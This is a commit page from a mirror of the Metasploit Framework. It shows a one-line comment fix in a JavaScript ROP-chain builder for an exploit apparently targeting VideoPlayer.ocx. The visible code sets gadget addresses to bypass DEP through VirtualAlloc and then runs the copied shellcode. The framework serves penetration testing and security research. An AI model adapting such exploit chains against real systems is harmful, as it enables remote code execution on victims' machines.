infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix comment

bug/bundler_fix
jvazquez-r7 2015-02-06 11:34:20 -06:00
parent f6933ed02c
commit 414349972f
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
data/exploits/edb-35948/js/rop_builder.js
View File

@ -8,14 +8,14 @@ var RopBuilder = function(informer, addresses, scLength) {
this.scLength = scLength; this.scLength = scLength;
}; };
// Calculate VideoPlayer.ocx base // Build the ROP chain to bypass DEP
RopBuilder.prototype.buildRop = function() { RopBuilder.prototype.buildRop = function() {
// ROP chain (rets in comments are omitted) // ROP chain (rets in comments are omitted)
// we perform: // we perform:
// (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX) // (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
// memcpy(EAX, shellcode, shellcodeLen) // memcpy(EAX, shellcode, shellcodeLen)
// (void(*)())EAX() // (void(*)())EAX()
var offs = 0x30/4; // offset to chain after CALL [EAX+0x30] var offs = 0x30/4; // offset to chain after CALL [EAX+0x30]
this.rop[0] = this.base + 0x1ff6; // ADD ESP, 0x30; this.rop[0] = this.base + 0x1ff6; // ADD ESP, 0x30;
this.rop[offs + 0x0] = this.base + 0x1ea1e; // XCHG EAX, ESP; <-- first gadget called this.rop[offs + 0x0] = this.base + 0x1ea1e; // XCHG EAX, ESP; <-- first gadget called
this.rop[offs + 0x1] = this.virtualAlloc; // allocate RWX mem (address avail. in EAX) this.rop[offs + 0x1] = this.virtualAlloc; // allocate RWX mem (address avail. in EAX)